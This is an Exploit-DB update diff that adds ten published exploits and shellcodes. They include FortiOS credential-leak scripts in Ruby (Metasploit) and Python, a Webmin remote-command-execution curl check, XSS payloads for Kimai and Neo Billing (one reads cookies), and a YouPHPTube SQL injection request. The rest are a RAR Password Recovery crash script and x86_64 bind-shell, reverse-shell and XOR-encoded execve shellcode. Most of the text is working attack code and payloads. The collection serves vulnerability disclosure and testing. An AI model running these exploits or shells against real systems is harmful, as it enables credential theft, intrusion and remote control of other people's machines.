DB: 2019-08-20

10 changes to exploits/shellcodes

RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service
Kimai 2 - Persistent Cross-Site Scripting
FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
Neo Billing 3.5 - Persistent Cross-Site Scripting
Webmin 1.920 - Remote Code Execution
YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection

Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)
Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)
Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)

exploits/hardware/webapps/47287.rb

@@ -0,0 +1,78 @@
+# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Google Dork: intext:"Please Login" inurl:"/remote/login"
+# Date: 17/08/2019
+# Exploit Author: Carlos E. Vieira
+# Vendor Homepage: https://www.fortinet.com/
+# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
+# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+# Tested on: 5.6.6
+# CVE : CVE-2018-13379
+
+require 'msf/core'
+class MetasploitModule < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Post::File 
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SSL VPN FortiOs - System file leak',
+			'Description'    => %q{
+				FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
+				This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
+				This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+			},
+			'References'     =>
+			    [
+			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
+			    ],
+			'Author'         => [ 'lynx (Carlos Vieira)' ],
+			'License'        => MSF_LICENSE,
+			 'DefaultOptions' =>
+		      {
+		        'RPORT' => 443,
+		        'SSL' => true
+		      },
+			))
+
+	end
+
+
+	def run()
+		print_good("Checking target...")
+		res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})
+
+		if res && res.code == 200
+			print_good("Target is Vulnerable!")
+			data = res.body
+			current_host = datastore['RHOST']
+			filename = "msf_sslwebsession_"+current_host+".bin"
+			File.delete(filename) if File.exist?(filename)
+			file_local_write(filename, data)
+			print_good("Parsing binary file.......")
+			parse()
+		else
+			if(res && res.code == 404)
+				print_error("Target not Vulnerable")
+			else
+				print_error("Ow crap, try again...")
+			end
+		end
+	end
+	def parse()
+		current_host = datastore['RHOST']
+
+	    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
+	    words = 0
+	    while (line = fileObj.gets)
+	    	printable_data = line.gsub(/[^[:print:]]/, '.')
+	    	array_data = printable_data.scan(/.{1,60}/m)
+	    	for ar in array_data
+	    		if ar != "............................................................"
+	    			print_good(ar)
+	    		end
+	    	end
+	    	#print_good(printable_data)
+	    	
+		end	
+		fileObj.close	
+	end
+end

exploits/hardware/webapps/47288.py

@@ -0,0 +1,96 @@
+# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Google Dork: intext:"Please Login" inurl:"/remote/login"
+# Date: 17/08/2019
+# Exploit Author: Carlos E. Vieira
+# Vendor Homepage: https://www.fortinet.com/
+# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
+# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+# Tested on: 5.6.6
+# CVE : CVE-2018-13379
+
+# Exploit SSLVPN Fortinet - FortiOs
+#!/usr/bin/env python
+import requests, sys, time
+import urllib3
+urllib3.disable_warnings()
+
+
+def leak(host, port):
+	print("[!] Leak information...")
+	try:
+		url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+		headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}		
+		r=requests.get(url, headers=headers, verify=False, stream=True)
+		img=r.raw.read()
+		if "var fgt_lang =" in str(img):
+			with open("sslvpn_websession_"+host+".dat", 'w') as f:
+				f.write(img)		
+			print("[>] Save to file ....")
+			parse(host)
+			print("\n")
+			return True
+		else:
+			return False
+	except requests.exceptions.ConnectionError:
+		return False
+def is_character_printable(s):
+	return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
+
+def is_printable(byte):
+	if is_character_printable(byte):
+    		return byte
+  	else:
+    		return '.' 
+
+def read_bytes(host, chunksize=8192):
+	print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
+	with open("sslvpn_websession_"+host+".dat", "rb") as f:
+    		while True:
+        		chunk = f.read(chunksize)
+        		if chunk:
+          			for b in chunk:
+            				yield b
+        		else:
+          			break
+def parse(host):
+    print("[!] Parsing Information...")
+    memory_address = 0
+    ascii_string = ""
+    for byte in read_bytes(host):
+    	ascii_string = ascii_string + is_printable(byte)
+	if memory_address%61 == 60:
+		if ascii_string!=".............................................................":
+	    		print ascii_string
+	    	ascii_string = ""
+	memory_address = memory_address + 1
+
+def check(host, port):
+    print("[!] Check vuln...")
+    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+    try:
+        r = requests.get("https://" + host + ":" + port + uri, verify=False)
+        if(r.status_code == 200):
+            return True
+        elif(r.status_code == 404):
+            return False
+        else:
+            return False
+    except:
+        return False
+def main(host, port):
+    print("[+] Start exploiting....")
+    vuln = check(host, port)
+    if(vuln):
+        print("[+] Target is vulnerable!")
+        bin_file = leak(host, port)
+    else:
+        print("[X] Target not vulnerable.")
+
+if __name__ == "__main__":
+
+    if(len(sys.argv) < 3):
+        print("Use: python {} ip/dns port".format(sys.argv[0]))
+    else:
+        host = sys.argv[1]
+        port = sys.argv[2]
+        main(host, port)

exploits/linux/webapps/47293.sh

@@ -0,0 +1,31 @@
+#!/bin/sh
+#
+# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
+# based on Metasploit module https://www.exploit-db.com/exploits/47230
+# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
+# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
+#
+# Fernando A. Lagos B. (Zerial)
+# https://blog.zerial.org
+# https://blog.nivel4.com
+#
+# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
+#
+# Usage: sh CVE-2019-15107.sh https://target:port
+# Example: sh CVE-2019-15107.sh https://localhost:10000
+# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
+#
+
+FLAG="f3a0c13c3765137bcde68572707ae5c0"
+URI=$1;
+
+echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
+curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
+
+if [ $? -eq 0 ];
+then
+	echo '\033[0;31mVULNERABLE!\033[0m'
+else
+	echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
+fi
+#EOF

exploits/php/webapps/47286.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
+# Date: 07/15/2019
+# Exploit Author: osamaalaa
+# Vendor Homepage: [link]
+# Software Link: https://github.com/kevinpapst/kimai2
+# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
+# Version: 2
+
+1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create
+
+2-Add this payload "><svg/onload=alert('xss')> in the description
+
+3-Save The changes
+
+4-refresh and we have alert pop up!
+
+The Request POC :
+
+POST /index.php/en/timesheet/create HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 392
+Connection: close
+Referer: http://localhost
+Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv
+
+timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0

exploits/php/webapps/47289.txt

@@ -0,0 +1,57 @@
+# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
+# Date: 18.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
+# Version: 3.5
+# CWE : CWE-79
+
+[Description]
+
+# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
+# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. 
+
+[Proof of Concept]
+
+# 1. Authorization  as customer (regular user account) [//host/neo/crm/user/login]
+# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
+# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] 
+
+[Example paylods]
+
+# Example payload: "><img src="x" onerror="alert('XSS');">
+# Example payload: "><script>alert(document.cookie)</script>
+
+[POST Request]
+
+POST /neo/crm/tickets/addticket HTTP/1.1
+Host: host
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: //host/neo/crm/tickets/addticket
+Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
+Content-Length: 694
+Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
+Connection: close
+Upgrade-Insecure-Requests: 1
+ 
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="title"
+ 
+"><script>alert('XSS')</script>
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="content"
+ 
+<p>"><script>alert('XSS')</script><br></p>
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+ 
+ 
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+ 
+ 
+-----------------------------899768029113033755249127523--

exploits/php/webapps/47294.txt

@@ -0,0 +1,36 @@
+# Exploit Title: YouPHPTube < 7.3 SQL Injection
+# Google Dork: /
+# Date: 19.08.2019
+# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
+# Vendor Homepage: https://www.youphptube.com/
+# Software Link: https://github.com/YouPHPTube/YouPHPTube
+# Version: < 7.3
+# Tested on: Linux/Windows
+# CVE : CVE-2019-14430
+
+The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.
+
+Example Request:
+
+POST /objects/userCreate.json.php HTTP/1.1
+Host: vulnerablehost.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+[SomeHeaders and Cookies]
+
+user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx
+
+Methods for DB-Extraction are:
+
+
+- Boolean-based blind
+
+- Error-based
+
+- AND/OR time-based blind
+
+
+The vulnerability was fixed with this commit:
+https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a

exploits/windows/dos/47285.py

@@ -0,0 +1,29 @@
+# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
+# Date: 16.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Software Link:  https://www.top-password.com/download/RARPRSetup.exe
+# Exploit Author: Achilles
+# Tested Version: v1.80
+# Tested on: Windows 7 x64
+#            Windows XP SP3
+
+
+# 1.- Run python code :RAR Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open RAR Password Recovery and Click 'Register'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

files_exploits.csv

@@ -6550,6 +6550,7 @@ id,file,description,date,author,type,platform,port
 47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
 47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
 47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64,
+47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41646,3 +41647,9 @@ id,file,description,date,author,type,platform,port
 47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php,
 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
+47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80
+47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
+47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
+47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80

files_shellcodes.csv

@@ -996,3 +996,6 @@ id,file,description,date,author,type,platform
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64

shellcodes/linux_x86-64/47290.c

@@ -0,0 +1,189 @@
+/*
+; Title		: Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+global _start
+
+%define pass "pass"
+%define port 0x5c11  ; htons(4444)
+
+_start:
+    jmp real_start
+    password: db pass
+    pass_len: db $-password
+
+real_start:
+socket:
+    ; sock = socket(AF_INET, SOCK_STREAM, 0)
+    ; AF_INET = 2
+    ; SOCK_STREAM = 1
+    ; __NR_socket = 41
+    ; On success, a file descriptor for the new socket is returned
+
+    push 41
+    pop rax
+    push 2
+    pop rdi
+    push 1
+    pop rsi
+    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)
+    syscall
+
+    push rax
+    pop rdi
+
+bind:
+    ; server.sin_family = AF_INET;    short
+    ; server.sin_port = htons(4444);    unsigned short
+    ; server.sin_addr.s_addr = INADDR_ANY;    unsigned long
+    ; bzero(&server.sin_zero, 8);
+    ;
+    ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
+    ; struct sockaddr_in {
+    ;     short            sin_family;
+    ;     unsigned short   sin_port;
+    ;     struct in_addr   sin_addr;
+    ;     char             sin_zero[8];
+    ; };
+    ;
+    ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
+    ; INADDR_ANY = 0
+    ; AF_INET = 2
+    ; __NR_bind = 49
+    ; On  success,  zero is returned
+
+    xor eax, eax  ; shorter and will still zero the upper bytes
+    push rax      ; sin_zero
+    push ax
+    push ax       ; sin_addr
+    push word port
+    push word 2
+
+    ; bind
+    add al, 49
+    push rsp
+    pop rsi
+    add dl, 16    ; sizeof(sockaddr_in)
+    syscall
+
+listen:
+    ; listen(sock, 2)
+    ; __NR_listen = 50
+    ; On success, zero is returned
+
+    mov al, 50
+    xor esi, esi
+    mov sil, 2
+    syscall
+
+accept:
+    ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
+    ; __NR_accept = 43
+    ; On success, a file descriptor is returned
+
+    mov al, 43
+    xor esi, esi
+    ;xor rdx, rdx  ; already zeroed
+    syscall
+
+    push rax
+
+;close:
+    ; close(sock)
+    ; __NR_close = 3
+    ; returns zero on success
+
+    ; closing is not strictly necessary
+    ;mov al, 3
+    ;syscall
+
+dup2:
+    ; dup2(new, 0);
+    ; dup2(new, 1);
+    ; dup2(new, 2);
+    ; __NR_dup2 = 33
+    ; On success, return the new file descriptor
+
+    pop rdi        ; "new" was pushed in accept()
+    push 2
+    pop rsi
+
+dup2_loop:
+    mov al, 33
+    syscall
+    dec esi
+    jns dup2_loop
+
+read_password:
+    ; read(int fd, void *buf, size_t count)
+    ; On success, the number of bytes read is returned
+
+    ;xor eax, eax  ; already done by dup2
+    ;rdi = "new"   ; already done in dup2
+    push rax
+    push rax       ; create space for "buf" in the stack
+    push rsp
+    pop rsi        ; rsi = *buf
+    mov dl, 16
+    syscall
+
+compare_password:
+    xor ecx, ecx
+    lea rdi, [rel pass_len]
+    mov cl, [rdi]
+    sub rdi, rcx
+    cld
+    repz cmpsb
+    jne exit
+
+execve:
+    ; execve(const char *path, char *const argv[], char *const envp[])
+    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
+    ; rsi, argv = (char**) (/bin//sh, 0x00)
+    ; rdx, envp = &0x00
+
+    xor eax, eax
+    push rax
+    push rsp
+    pop rdx      ; *rdx = &0x00
+
+    mov rsi, 0x68732f2f6e69622f  ; rax2 -S $(echo /bin//sh | rev)
+    push rsi
+    push rsp
+    pop rdi      ; rdi = (char*) /bin//sh
+
+    push rax
+    push rdi
+    push rsp
+    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)
+
+    mov al, 59
+    syscall
+
+exit:
+    ;xor eax, eax  ; upper bytes are zero after read
+    mov al, 60
+    syscall
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
+"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04"
+"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0"
+"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8"
+"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a"
+"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62"
+"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0"
+"\x3c\x0f\x05";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}

shellcodes/linux_x86-64/47291.c

@@ -0,0 +1,155 @@
+/*
+; Title		: Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+global _start
+
+%define pass "pass"
+%define port 0x5c11  ; htons(4444)
+
+_start:
+    jmp real_start
+    password: db pass
+    pass_len: db $-password
+
+real_start:
+socket:
+    ; sock = socket(AF_INET, SOCK_STREAM, 0)
+    ; AF_INET = 2
+    ; SOCK_STREAM = 1
+    ; __NR_socket = 41
+    ; On success, a file descriptor for the new socket is returned
+
+    push 41
+    pop rax
+    push 2
+    pop rdi
+    push 1
+    pop rsi
+    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)
+    syscall
+
+    push rax
+    pop rdi
+
+connect:
+    ; server.sin_family = AF_INET;    short
+    ; server.sin_port = htons(4444);    unsigned short
+    ; server.sin_addr.s_addr = inet_addr("127.0.0.1");    unsigned long
+    ; bzero(&server.sin_zero, 8);
+    ;
+    ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
+    ; struct sockaddr_in {
+    ;     short            sin_family;
+    ;     unsigned short   sin_port;
+    ;     struct in_addr   sin_addr;
+    ;     char             sin_zero[8];
+    ; };
+    ;
+    ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+    ; AF_INET = 2
+    ; __NR_connect = 42
+    ; On success, zero is returned
+
+    xor eax, eax
+    push rax          ; sin_zero
+    push 0x10ffff70   ; sin_addr (xored)
+    xor dword [rsp], 0x11ffff0f ; recover sin_addr
+    push word port
+    push word 2
+
+    ; connect
+    add al, 42
+    push rsp
+    pop rsi
+    add dl, 16    ; sizeof(sockaddr_in)
+    syscall
+
+dup2:
+    ; dup2(sock, 0);
+    ; dup2(sock, 1);
+    ; dup2(sock, 2);
+    ; __NR_dup2 = 33
+    ; On success, return the new file descriptor
+
+    push 2
+    pop rsi
+
+dup2_loop:
+    mov al, 33
+    syscall
+    dec esi
+    jns dup2_loop
+
+read_password:
+    ; read(int fd, void *buf, size_t count)
+    ; On success, the number of bytes read is returned
+
+    ;xor eax, eax  ; already done by dup2
+    ;rdi = "sock"  ; already done
+    push rax
+    push rax       ; create space for "buf" in the stack
+    push rsp
+    pop rsi        ; rsi = *buf
+    mov dl, 16
+    syscall
+
+compare_password:
+    xor ecx, ecx
+    lea rdi, [rel pass_len]
+    mov cl, [rdi]
+    sub rdi, rcx
+    cld
+    repz cmpsb
+    jne exit
+
+execve:
+    ; execve(const char *path, char *const argv[], char *const envp[])
+    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
+    ; rsi, argv = (char**) (/bin//sh, 0x00)
+    ; rdx, envp = &0x00
+
+    xor eax, eax
+    push rax
+    push rsp
+    pop rdx      ; *rdx = &0x00
+
+    mov rsi, 0x68732f2f6e69622f  ; rax2 -S $(echo /bin//sh | rev)
+    push rsi
+    push rsp
+    pop rdi      ; rdi = (char*) /bin//sh
+
+    push rax
+    push rdi
+    push rsp
+    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)
+
+    mov al, 59
+    syscall
+
+exit:
+    ;xor eax, eax  ; upper bytes are zero after read
+    mov al, 60
+    syscall
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
+"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11"
+"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02"
+"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31"
+"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a"
+"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f"
+"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}

shellcodes/linux_x86-64/47292.c

@@ -0,0 +1,47 @@
+/*
+; Title		: Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+; this only works on machines with a CPU that supports AVX2 instructions
+
+global _start
+
+_start:
+    jmp call_decoder
+
+decoder:
+    pop rsi
+    lea rdi, [rsi+1]
+
+    ; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
+    ; for longer shellcodes a loop could be added
+    vpbroadcastb ymm1, [rsi]  ; avx2
+    vmovdqu ymm0, [rdi]       ; avx
+    vpxor ymm0, ymm1          ; avx2
+    vmovdqu [rdi], ymm0       ; avx
+
+    jmp encoded_shellcode
+
+call_decoder:
+    call decoder
+    xor_value: db 0xaa
+    encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x18\x5e\x48\x8d\x7e\x01\xc4\xe2\x7d\x78\x0e\xc5\xfe\x6f\x07\xc5\xfd"
+"\xef\xc1\xc5\xfe\x7f\x07\xeb\x06\xe8\xe3\xff\xff\xff\xaa\xe2\x9b\x6a\xfa"
+"\xe2\x23\x48\xe2\x14\x85\xc8\xc3\xc4\x85\x85\xd9\xc2\xfc\xe2\x23\x4d\xfa"
+"\xfd\xe2\x23\x4c\x1a\x91\xa5\xaf";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}